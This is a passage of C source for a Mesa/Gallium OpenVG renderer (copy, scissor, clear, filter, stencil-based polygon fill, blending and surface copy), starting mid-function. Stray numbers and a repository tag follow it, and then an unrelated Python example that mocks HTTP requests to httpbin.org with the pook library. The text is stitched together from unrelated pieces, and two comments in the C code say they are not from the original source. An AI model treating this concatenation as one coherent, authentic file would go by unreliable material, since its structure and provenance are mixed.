renderer->u.copy.tex_height = src->texture->height0;
renderer->state = RENDERER_STATE_COPY;
return VG_TRUE;
}
/**
* Draw into the destination rectangle given by (x, y, w, h). The texture is
* sampled from within the rectangle given by (sx, sy, sw, sh).
*
* The coordinates are in surface coordinates.
*/
void renderer_copy(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_COPY);
/* there is no depth buffer for scissoring anyway */
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_FALSE);
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.copy.tex_width,
renderer->u.copy.tex_height);
renderer_quad_draw(renderer);
}
/**
* End copying and restore the states.
*/
void renderer_copy_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_COPY);
cso_restore_framebuffer(renderer->cso);
cso_restore_viewport(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
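/* Hedged usage sketch (not from the original source): the begin/draw/end calling
 * pattern for the copy path. "dst_surf" and "src_view" stand in for a render-target
 * surface and a sampler view owned by the caller.
 *
 *    if (renderer_copy_begin(renderer, dst_surf, VG_TRUE, src_view)) {
 *       renderer_copy(renderer, 0, 0, 64, 64, 0, 0, 64, 64);
 *       renderer_copy_end(renderer);
 *    }
 */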
/**
* Prepare the renderer for textured drawing.
*/
VGboolean renderer_drawtex_begin(struct renderer *renderer,
struct pipe_sampler_view *src)
{
assert(renderer->state == RENDERER_STATE_INIT);
if (!renderer_can_support(renderer, src->texture, PIPE_BIND_SAMPLER_VIEW))
return VG_FALSE;
cso_save_blend(renderer->cso);
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_blend(renderer, ~0);
renderer_set_samplers(renderer, 1, &src);
renderer_set_fs(renderer, RENDERER_FS_TEXTURE);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
renderer_set_mvp(renderer, NULL);
/* remember the texture size */
renderer->u.drawtex.tex_width = src->texture->width0;
renderer->u.drawtex.tex_height = src->texture->height0;
renderer->state = RENDERER_STATE_DRAWTEX;
return VG_TRUE;
}
/**
* Draw into the destination rectangle given by (x, y, w, h). The texture is
* sampled from within the rectangle given by (sx, sy, sw, sh).
*
* The coordinates are in surface coordinates.
*/
void renderer_drawtex(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_DRAWTEX);
/* with scissoring */
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_TRUE);
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.drawtex.tex_width,
renderer->u.drawtex.tex_height);
renderer_quad_draw(renderer);
}
/**
* End textured drawing and restore the states.
*/
void renderer_drawtex_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_DRAWTEX);
cso_restore_blend(renderer->cso);
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for scissor update. This will reset the depth buffer
* to 1.0f.
*/
VGboolean renderer_scissor_begin(struct renderer *renderer,
VGboolean restore_dsa)
{
struct pipe_depth_stencil_alpha_state dsa;
assert(renderer->state == RENDERER_STATE_INIT);
if (restore_dsa)
cso_save_depth_stencil_alpha(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_fragment_shader(renderer->cso);
/* enable depth writes */
memset(&dsa, 0, sizeof(dsa));
dsa.depth.enabled = 1;
dsa.depth.writemask = 1;
dsa.depth.func = PIPE_FUNC_ALWAYS;
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
/* disable color writes */
renderer_set_blend(renderer, 0);
renderer_set_fs(renderer, RENDERER_FS_SCISSOR);
renderer_set_mvp(renderer, NULL);
renderer->u.scissor.restore_dsa = restore_dsa;
renderer->state = RENDERER_STATE_SCISSOR;
/* clear the depth buffer to 1.0f */
renderer->pipe->clear(renderer->pipe,
PIPE_CLEAR_DEPTHSTENCIL, NULL, 1.0f, 0);
return VG_TRUE;
}
/**
* Add a scissor rectangle. Depth values inside the rectangle will be set to
* 0.0f.
*/
void renderer_scissor(struct renderer *renderer,
VGint x, VGint y, VGint width, VGint height)
{
assert(renderer->state == RENDERER_STATE_SCISSOR);
renderer_quad_pos(renderer, x, y, x + width, y + height, VG_FALSE);
renderer_quad_draw(renderer);
}
/**
* End scissor update and restore the states.
*/
void renderer_scissor_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_SCISSOR);
if (renderer->u.scissor.restore_dsa)
cso_restore_depth_stencil_alpha(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for clearing.
*/
VGboolean renderer_clear_begin(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_INIT);
cso_save_blend(renderer->cso);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_blend(renderer, ~0);
renderer_set_fs(renderer, RENDERER_FS_COLOR);
renderer_set_vs(renderer, RENDERER_VS_COLOR);
renderer_set_mvp(renderer, NULL);
renderer->state = RENDERER_STATE_CLEAR;
return VG_TRUE;
}
/**
* Clear the framebuffer with the specified region and color.
*
* The coordinates are in surface coordinates.
*/
void renderer_clear(struct renderer *renderer,
VGint x, VGint y, VGint width, VGint height,
const VGfloat color[4])
{
VGuint i;
assert(renderer->state == RENDERER_STATE_CLEAR);
renderer_quad_pos(renderer, x, y, x + width, y + height, VG_TRUE);
for (i = 0; i < 4; i++)
memcpy(renderer->vertices[i][1], color, sizeof(VGfloat) * 4);
renderer_quad_draw(renderer);
}
/**
* End clearing and retore the states.
*/
void renderer_clear_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_CLEAR);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
cso_restore_vertex_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for image filtering.
*/
VGboolean renderer_filter_begin(struct renderer *renderer,
struct pipe_resource *dst,
VGboolean y0_top,
VGbitfield channel_mask,
const struct pipe_sampler_state **samplers,
struct pipe_sampler_view **views,
VGint num_samplers,
void *fs,
const void *const_buffer,
VGint const_buffer_len)
{
struct pipe_surface *surf, surf_tmpl;
assert(renderer->state == RENDERER_STATE_INIT);
if (!fs)
return VG_FALSE;
if (!renderer_can_support(renderer, dst, PIPE_BIND_RENDER_TARGET))
return VG_FALSE;
u_surface_default_template(&surf_tmpl, dst,
PIPE_BIND_RENDER_TARGET);
surf = renderer->pipe->create_surface(renderer->pipe, dst, &surf_tmpl);
if (!surf)
return VG_FALSE;
cso_save_framebuffer(renderer->cso);
cso_save_viewport(renderer->cso);
cso_save_blend(renderer->cso);
/* set the image as the target */
renderer_set_target(renderer, surf, NULL, y0_top);
pipe_surface_reference(&surf, NULL);
renderer_set_blend(renderer, channel_mask);
if (num_samplers) {
struct pipe_resource *tex;
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_custom_fs(renderer, fs,
samplers, views, num_samplers,
const_buffer, const_buffer_len);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
tex = views[0]->texture;
renderer->u.filter.tex_width = tex->width0;
renderer->u.filter.tex_height = tex->height0;
renderer->u.filter.use_sampler = VG_TRUE;
}
else {
cso_save_fragment_shader(renderer->cso);
renderer_set_custom_fs(renderer, fs, NULL, NULL, 0,
const_buffer, const_buffer_len);
renderer->u.filter.use_sampler = VG_FALSE;
}
renderer_set_mvp(renderer, NULL);
renderer->state = RENDERER_STATE_FILTER;
return VG_TRUE;
}
/**
* Draw into a rectangle of the destination with the specified region of the
* texture(s).
*
* The coordinates are in surface coordinates.
*/
void renderer_filter(struct renderer *renderer,
VGint x, VGint y, VGint w, VGint h,
VGint sx, VGint sy, VGint sw, VGint sh)
{
assert(renderer->state == RENDERER_STATE_FILTER);
renderer_quad_pos(renderer, x, y, x + w, y + h, VG_FALSE);
if (renderer->u.filter.use_sampler) {
renderer_quad_texcoord(renderer, sx, sy, sx + sw, sy + sh,
renderer->u.filter.tex_width,
renderer->u.filter.tex_height);
}
renderer_quad_draw(renderer);
}
/**
* End image filtering and restore the states.
*/
void renderer_filter_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_FILTER);
if (renderer->u.filter.use_sampler) {
cso_restore_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_restore_vertex_shader(renderer->cso);
}
cso_restore_framebuffer(renderer->cso);
cso_restore_viewport(renderer->cso);
cso_restore_blend(renderer->cso);
cso_restore_fragment_shader(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for polygon silhouette rendering.
*/
VGboolean renderer_polygon_stencil_begin(struct renderer *renderer,
struct pipe_vertex_element *velem,
VGFillRule rule,
VGboolean restore_dsa)
{
struct pipe_depth_stencil_alpha_state *dsa;
VGboolean manual_two_sides;
assert(renderer->state == RENDERER_STATE_INIT);
cso_save_vertex_elements(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_depth_stencil_alpha(renderer->cso);
cso_set_vertex_elements(renderer->cso, 1, velem);
/* disable color writes */
renderer_set_blend(renderer, 0);
manual_two_sides = VG_FALSE;
dsa = &renderer->u.polygon_stencil.dsa;
memset(dsa, 0, sizeof(*dsa));
if (rule == VG_EVEN_ODD) {
dsa->stencil[0].enabled = 1;
dsa->stencil[0].writemask = 1;
dsa->stencil[0].fail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zfail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zpass_op = PIPE_STENCIL_OP_INVERT;
dsa->stencil[0].func = PIPE_FUNC_ALWAYS;
dsa->stencil[0].valuemask = ~0;
}
else {
assert(rule == VG_NON_ZERO);
/* front face */
dsa->stencil[0].enabled = 1;
dsa->stencil[0].writemask = ~0;
dsa->stencil[0].fail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zfail_op = PIPE_STENCIL_OP_KEEP;
dsa->stencil[0].zpass_op = PIPE_STENCIL_OP_INCR_WRAP;
dsa->stencil[0].func = PIPE_FUNC_ALWAYS;
dsa->stencil[0].valuemask = ~0;
if (renderer->pipe->screen->get_param(renderer->pipe->screen,
PIPE_CAP_TWO_SIDED_STENCIL)) {
/* back face */
dsa->stencil[1] = dsa->stencil[0];
dsa->stencil[1].zpass_op = PIPE_STENCIL_OP_DECR_WRAP;
}
else {
manual_two_sides = VG_TRUE;
}
}
cso_set_depth_stencil_alpha(renderer->cso, dsa);
if (manual_two_sides)
cso_save_rasterizer(renderer->cso);
renderer->u.polygon_stencil.manual_two_sides = manual_two_sides;
renderer->u.polygon_stencil.restore_dsa = restore_dsa;
renderer->state = RENDERER_STATE_POLYGON_STENCIL;
return VG_TRUE;
}
/**
* Render a polygon silhouette to stencil buffer.
*/
void renderer_polygon_stencil(struct renderer *renderer,
struct pipe_vertex_buffer *vbuf,
VGuint mode, VGuint start, VGuint count)
{
assert(renderer->state == RENDERER_STATE_POLYGON_STENCIL);
cso_set_vertex_buffers(renderer->cso, 1, vbuf);
if (!renderer->u.polygon_stencil.manual_two_sides) {
cso_draw_arrays(renderer->cso, mode, start, count);
}
else {
struct pipe_rasterizer_state raster;
struct pipe_depth_stencil_alpha_state dsa;
raster = renderer->g3d.rasterizer;
dsa = renderer->u.polygon_stencil.dsa;
/* front */
raster.cull_face = PIPE_FACE_BACK;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_INCR_WRAP;
cso_set_rasterizer(renderer->cso, &raster);
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
cso_draw_arrays(renderer->cso, mode, start, count);
/* back */
raster.cull_face = PIPE_FACE_FRONT;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_DECR_WRAP;
cso_set_rasterizer(renderer->cso, &raster);
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
cso_draw_arrays(renderer->cso, mode, start, count);
}
}
/**
* End polygon silhouette rendering.
*/
void renderer_polygon_stencil_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_POLYGON_STENCIL);
if (renderer->u.polygon_stencil.manual_two_sides)
cso_restore_rasterizer(renderer->cso);
cso_restore_vertex_elements(renderer->cso);
/* restore color writes */
cso_restore_blend(renderer->cso);
if (renderer->u.polygon_stencil.restore_dsa)
cso_restore_depth_stencil_alpha(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
/**
* Prepare the renderer for polygon filling.
*/
VGboolean renderer_polygon_fill_begin(struct renderer *renderer,
VGboolean save_dsa)
{
struct pipe_depth_stencil_alpha_state dsa;
assert(renderer->state == RENDERER_STATE_INIT);
if (save_dsa)
cso_save_depth_stencil_alpha(renderer->cso);
/* setup stencil ops */
memset(&dsa, 0, sizeof(dsa));
dsa.stencil[0].enabled = 1;
dsa.stencil[0].func = PIPE_FUNC_NOTEQUAL;
dsa.stencil[0].fail_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].zfail_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].valuemask = ~0;
dsa.stencil[0].writemask = ~0;
dsa.depth = renderer->g3d.dsa.depth;
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
renderer->state = RENDERER_STATE_POLYGON_FILL;
return VG_TRUE;
}
/**
* Fill a polygon.
*/
void renderer_polygon_fill(struct renderer *renderer,
VGfloat min_x, VGfloat min_y,
VGfloat max_x, VGfloat max_y)
{
assert(renderer->state == RENDERER_STATE_POLYGON_FILL);
renderer_quad_pos(renderer, min_x, min_y, max_x, max_y, VG_TRUE);
renderer_quad_draw(renderer);
}
/**
* End polygon filling.
*/
void renderer_polygon_fill_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_POLYGON_FILL);
cso_restore_depth_stencil_alpha(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
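/* Hedged usage sketch (not from the original source): the two-pass fill used by path
 * rendering -- accumulate winding in the stencil buffer first, then fill the bounding
 * quad wherever the stencil test passes. "velem", "vbuf" and the extents are
 * placeholders supplied by the caller.
 *
 *    renderer_polygon_stencil_begin(renderer, &velem, VG_NON_ZERO, VG_TRUE);
 *    renderer_polygon_stencil(renderer, &vbuf, PIPE_PRIM_TRIANGLE_FAN, 0, num_verts);
 *    renderer_polygon_stencil_end(renderer);
 *    renderer_polygon_fill_begin(renderer, VG_TRUE);
 *    renderer_polygon_fill(renderer, min_x, min_y, max_x, max_y);
 *    renderer_polygon_fill_end(renderer);
 */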
struct renderer * renderer_create(struct vg_context *owner)
{
   struct renderer *renderer;
   struct pipe_rasterizer_state *raster;
   struct pipe_stencil_ref sr;
   VGint i;

   renderer = CALLOC_STRUCT(renderer);
   if (!renderer)
      return NULL;

   renderer->pipe = owner->pipe;
   renderer->cso = owner->cso_context;

   /* init vertex data that doesn't change */
   for (i = 0; i < 4; i++)
      renderer->vertices[i][0][3] = 1.0f; /* w */

   for (i = 0; i < 2; i++) {
      renderer->velems[i].src_offset = i * 4 * sizeof(float);
      renderer->velems[i].instance_divisor = 0;
      renderer->velems[i].vertex_buffer_index = 0;
      renderer->velems[i].src_format = PIPE_FORMAT_R32G32B32A32_FLOAT;
   }
   cso_set_vertex_elements(renderer->cso, 2, renderer->velems);

   /* GL rasterization rules */
   raster = &renderer->g3d.rasterizer;
   memset(raster, 0, sizeof(*raster));
   raster->gl_rasterization_rules = 1;
   raster->depth_clip = 1;
   cso_set_rasterizer(renderer->cso, raster);

   /* fixed at 0 */
   memset(&sr, 0, sizeof(sr));
   cso_set_stencil_ref(renderer->cso, &sr);

   renderer_set_vs(renderer, RENDERER_VS_PLAIN);

   renderer->state = RENDERER_STATE_INIT;

   return renderer;
}
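
/**
 * Destroy a renderer, freeing its cached shaders and constant buffers.
 */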
void renderer_destroy(struct renderer *ctx)
{
   int i;

   for (i = 0; i < NUM_RENDERER_VS; i++) {
      if (ctx->cached_vs[i])
         cso_delete_vertex_shader(ctx->cso, ctx->cached_vs[i]);
   }
   for (i = 0; i < NUM_RENDERER_FS; i++) {
      if (ctx->cached_fs[i])
         cso_delete_fragment_shader(ctx->cso, ctx->cached_fs[i]);
   }

   pipe_resource_reference(&ctx->vs_cbuf, NULL);
   pipe_resource_reference(&ctx->fs_cbuf, NULL);

   FREE(ctx);
}
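
/**
 * Update the depth/stencil state used for scissoring.  When scissoring is
 * enabled, the scissor rectangles are rendered to the depth buffer and the
 * depth test is set up so that fragments outside them are rejected.
 */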
static void update_clip_state(struct renderer *renderer,
                              const struct vg_state *state)
{
   struct pipe_depth_stencil_alpha_state *dsa = &renderer->g3d.dsa;

   memset(dsa, 0, sizeof(struct pipe_depth_stencil_alpha_state));

   if (state->scissoring) {
      struct pipe_framebuffer_state *fb = &renderer->g3d.fb;
      int i;

      renderer_scissor_begin(renderer, VG_FALSE);

      for (i = 0; i < state->scissor_rects_num; ++i) {
         const float x = state->scissor_rects[i * 4 + 0].f;
         const float y = state->scissor_rects[i * 4 + 1].f;
         const float width = state->scissor_rects[i * 4 + 2].f;
         const float height = state->scissor_rects[i * 4 + 3].f;
         VGint x0, y0, x1, y1, iw, ih;

         x0 = (VGint) x;
         y0 = (VGint) y;
         if (x0 < 0)
            x0 = 0;
         if (y0 < 0)
            y0 = 0;

         /* note that x1 and y1 are exclusive */
         x1 = (VGint) ceilf(x + width);
         y1 = (VGint) ceilf(y + height);
         if (x1 > fb->width)
            x1 = fb->width;
         if (y1 > fb->height)
            y1 = fb->height;

         iw = x1 - x0;
         ih = y1 - y0;
         if (iw > 0 && ih > 0)
            renderer_scissor(renderer, x0, y0, iw, ih);
      }

      renderer_scissor_end(renderer);

      dsa->depth.enabled = 1;   /* glEnable(GL_DEPTH_TEST); */
      dsa->depth.writemask = 0; /* glDepthMask(FALSE); */
      dsa->depth.func = PIPE_FUNC_GEQUAL;
   }
}
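
/**
 * Set up fixed-function blending for the current blend mode.  Modes that
 * cannot be expressed this way are left to the fragment shader.
 */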
static void renderer_validate_blend(struct renderer *renderer,
                                    const struct vg_state *state,
                                    enum pipe_format fb_format)
{
   struct pipe_blend_state blend;

   memset(&blend, 0, sizeof(blend));
   blend.rt[0].colormask = PIPE_MASK_RGBA;
   blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
   blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
   blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
   blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;

   /* TODO alpha masking happens after blending? */

   switch (state->blend_mode) {
   case VG_BLEND_SRC:
      blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
      blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
      blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
      blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
      break;
   case VG_BLEND_SRC_OVER:
      /* use the blend state only when there is no alpha channel */
      if (!util_format_has_alpha(fb_format)) {
         blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_SRC_ALPHA;
         blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
         blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_INV_SRC_ALPHA;
         blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_INV_SRC_ALPHA;
         blend.rt[0].blend_enable = 1;
      }
      break;
   case VG_BLEND_SRC_IN:
      blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
      blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_DST_ALPHA;
      blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
      blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
      blend.rt[0].blend_enable = 1;
      break;
   case VG_BLEND_DST_IN:
      blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ZERO;
      blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ZERO;
      blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ONE;
      blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_SRC_ALPHA;
      blend.rt[0].blend_enable = 1;
      break;
   case VG_BLEND_DST_OVER:
   case VG_BLEND_MULTIPLY:
   case VG_BLEND_SCREEN:
   case VG_BLEND_DARKEN:
   case VG_BLEND_LIGHTEN:
   case VG_BLEND_ADDITIVE:
      /* need a shader */
      break;
   default:
      assert(!"not implemented blend mode");
      break;
   }

   cso_set_blend(renderer->cso, &blend);
}

/**
 * Propagate OpenVG state changes to the renderer.  Only framebuffer, blending
 * and scissoring states are relevant here.
 */
void renderer_validate(struct renderer *renderer,
                       VGbitfield dirty,
                       const struct st_framebuffer *stfb,
                       const struct vg_state *state)
{
   assert(renderer->state == RENDERER_STATE_INIT);

   dirty |= renderer->dirty;
   renderer->dirty = 0;

   if (dirty & FRAMEBUFFER_DIRTY) {
      struct pipe_framebuffer_state *fb = &renderer->g3d.fb;
      struct matrix *proj = &renderer->projection;

      memset(fb, 0, sizeof(struct pipe_framebuffer_state));
      fb->width = stfb->width;
      fb->height = stfb->height;
      fb->nr_cbufs = 1;
      fb->cbufs[0] = stfb->strb->surface;
      fb->zsbuf = stfb->dsrb->surface;
      cso_set_framebuffer(renderer->cso, fb);

      vg_set_viewport(renderer, VEGA_Y0_BOTTOM);

      matrix_load_identity(proj);
      matrix_translate(proj, -1.0f, -1.0f);
      matrix_scale(proj, 2.0f / fb->width, 2.0f / fb->height);

      /* we also got a new depth buffer */
      if (dirty & DEPTH_STENCIL_DIRTY) {
         renderer->pipe->clear(renderer->pipe,
                               PIPE_CLEAR_DEPTHSTENCIL, NULL, 0.0, 0);
      }
   }

   /* must be last because it renders to the depth buffer */
   if (dirty & DEPTH_STENCIL_DIRTY) {
      update_clip_state(renderer, state);
      cso_set_depth_stencil_alpha(renderer->cso, &renderer->g3d.dsa);
   }

   if (dirty & BLEND_DIRTY)
      renderer_validate_blend(renderer, state, stfb->strb->format);
}

/**
 * Prepare the renderer for the OpenVG pipeline.
 */
void renderer_validate_for_shader(struct renderer *renderer,
                                  const struct pipe_sampler_state **samplers,
                                  struct pipe_sampler_view **views,
                                  VGint num_samplers,
                                  const struct matrix *modelview,
                                  void *fs,
                                  const void *const_buffer,
                                  VGint const_buffer_len)
{
   struct matrix mvp = renderer->projection;

   /* will be used in POLYGON_STENCIL and POLYGON_FILL */
   matrix_mult(&mvp, modelview);
   renderer_set_mvp(renderer, &mvp);

   renderer_set_custom_fs(renderer, fs,
                          samplers, views, num_samplers,
                          const_buffer, const_buffer_len);
}
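
/**
 * Prepare the renderer for rendering to the mask layer.
 */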
void renderer_validate_for_mask_rendering(struct renderer *renderer,
                                          struct pipe_surface *dst,
                                          const struct matrix *modelview)
{
   struct matrix mvp = renderer->projection;

   /* will be used in POLYGON_STENCIL and POLYGON_FILL */
   matrix_mult(&mvp, modelview);
   renderer_set_mvp(renderer, &mvp);

   renderer_set_target(renderer, dst, renderer->g3d.fb.zsbuf, VG_FALSE);
   renderer_set_blend(renderer, ~0);
   renderer_set_fs(renderer, RENDERER_FS_WHITE);

   /* set internal dirty flags (hacky!) */
   renderer->dirty = FRAMEBUFFER_DIRTY | BLEND_DIRTY;
}
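
/**
 * Copy a rectangle from one surface to another, with optional flipping and
 * scaling.  The source region is first copied into a temporary texture,
 * which is then drawn to the destination.
 */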
void renderer_copy_surface(struct renderer *ctx,
                           struct pipe_surface *src,
                           int srcX0, int srcY0,
                           int srcX1, int srcY1,
                           struct pipe_surface *dst,
                           int dstX0, int dstY0,
                           int dstX1, int dstY1,
                           float z, unsigned filter)
{
   struct pipe_context *pipe = ctx->pipe;
   struct pipe_screen *screen = pipe->screen;
   struct pipe_sampler_view view_templ;
   struct pipe_sampler_view *view;
   struct pipe_box src_box;
   struct pipe_resource texTemp, *tex;
   const struct pipe_framebuffer_state *fb = &ctx->g3d.fb;
   const int srcW = abs(srcX1 - srcX0);
   const int srcH = abs(srcY1 - srcY0);
   const int srcLeft = MIN2(srcX0, srcX1);
   const int srcTop = MIN2(srcY0, srcY1);

   assert(filter == PIPE_TEX_MIPFILTER_NEAREST ||
          filter == PIPE_TEX_MIPFILTER_LINEAR);

   if (srcLeft != srcX0) {
      /* left-right flip */
      int tmp = dstX0;
      dstX0 = dstX1;
      dstX1 = tmp;
   }

   if (srcTop != srcY0) {
      /* up-down flip */
      int tmp = dstY0;
      dstY0 = dstY1;
      dstY1 = tmp;
   }

   assert(screen->is_format_supported(screen, src->format, PIPE_TEXTURE_2D,
                                      0, PIPE_BIND_SAMPLER_VIEW));
   assert(screen->is_format_supported(screen, dst->format, PIPE_TEXTURE_2D,
                                      0, PIPE_BIND_SAMPLER_VIEW));
   assert(screen->is_format_supported(screen, dst->format, PIPE_TEXTURE_2D,
                                      0, PIPE_BIND_RENDER_TARGET));

   /*
    * XXX for now we're always creating a temporary texture.
    * Strictly speaking that's not always needed.
    */

   /* create temp texture */
   memset(&texTemp, 0, sizeof(texTemp));
   texTemp.target = PIPE_TEXTURE_2D;
   texTemp.format = src->format;
   texTemp.last_level = 0;
   texTemp.width0 = srcW;
   texTemp.height0 = srcH;
   texTemp.depth0 = 1;
   texTemp.array_size = 1;
   texTemp.bind = PIPE_BIND_SAMPLER_VIEW;

   tex = screen->resource_create(screen, &texTemp);
   if (!tex)
      return;

   u_sampler_view_default_template(&view_templ, tex, tex->format);
   view = pipe->create_sampler_view(pipe, tex, &view_templ);
   if (!view)
      return;

   u_box_2d_zslice(srcLeft, srcTop, src->u.tex.first_layer, srcW, srcH, &src_box);
   pipe->resource_copy_region(pipe,
                              tex, 0, 0, 0, 0, /* dest */
                              src->texture, 0, &src_box);

   assert(floatsEqual(z, 0.0f));

   /* draw */
   if (fb->cbufs[0] == dst) {
      /* transform back to surface coordinates */
      dstY0 = dst->height - dstY0;
      dstY1 = dst->height - dstY1;

      if (renderer_drawtex_begin(ctx, view)) {
         renderer_drawtex(ctx,
                          dstX0, dstY0, dstX1 - dstX0, dstY1 - dstY0,
                          0, 0, view->texture->width0, view->texture->height0);
         renderer_drawtex_end(ctx);
      }
   }
   else {
      if (renderer_copy_begin(ctx, dst, VG_TRUE, view)) {
         renderer_copy(ctx,
                       dstX0, dstY0, dstX1 - dstX0, dstY1 - dstY0,
                       0, 0, view->texture->width0, view->texture->height0);
         renderer_copy_end(ctx);
      }
   }
}
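
/**
 * Draw a textured quad with explicitly specified vertex positions and
 * texture offsets.
 */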
void renderer_texture_quad(struct renderer *r,
                           struct pipe_resource *tex,
                           VGfloat x1offset, VGfloat y1offset,
                           VGfloat x2offset, VGfloat y2offset,
                           VGfloat x1, VGfloat y1,
                           VGfloat x2, VGfloat y2,
                           VGfloat x3, VGfloat y3,
                           VGfloat x4, VGfloat y4)
{
   const VGfloat z = 0.0f;

   assert(r->state == RENDERER_STATE_INIT);
   assert(tex->width0 != 0);
   assert(tex->height0 != 0);

   cso_save_vertex_shader(r->cso);
   renderer_set_vs(r, RENDERER_VS_TEXTURE);

   /* manually set up positions */
   r->vertices[0][0][0] = x1;
   r->vertices[0][0][1] = y1;
   r->vertices[0][0][2] = z;

   r->vertices[1][0][0] = x2;
   r->vertices[1][0][1] = y2;
   r->vertices[1][0][2] = z;

   r->vertices[2][0][0] = x3;
   r->vertices[2][0][1] = y3;
   r->vertices[2][0][2] = z;

   r->vertices[3][0][0] = x4;
   r->vertices[3][0][1] = y4;
   r->vertices[3][0][2] = z;

   /* texcoords */
   renderer_quad_texcoord(r, x1offset, y1offset,
                          x2offset, y2offset, tex->width0, tex->height0);

   renderer_quad_draw(r);

   cso_restore_vertex_shader(r->cso);
}
| 22,173 |
304 |
<reponame>Megarushing/pook
import pook
import requests
# Enable mock engine
pook.on()
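
# Declare mocks; matching requests below are answered by pook
# instead of reaching the real httpbin.org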
pook.get('httpbin.org/ip',
         reply=403, response_type='json',
         response_headers={'server': 'pook'},
         response_json={'error': 'not found'})

pook.get('httpbin.org/headers',
         reply=404, response_type='json',
         response_headers={'server': 'pook'},
         response_json={'error': 'not found'})

res = requests.get('http://httpbin.org/ip')
print('Status:', res.status_code)
print('Headers:', res.headers)
print('Body:', res.json())
res = requests.get('http://httpbin.org/headers')
print('Status:', res.status_code)
print('Headers:', res.headers)
print('Body:', res.json())
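
# Inspect the mock engine: which mocks matched and which requests did not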
print('Is done:', pook.isdone())
print('Pending mocks:', pook.pending_mocks())
print('Unmatched requests:', pook.unmatched_requests())
| 330 |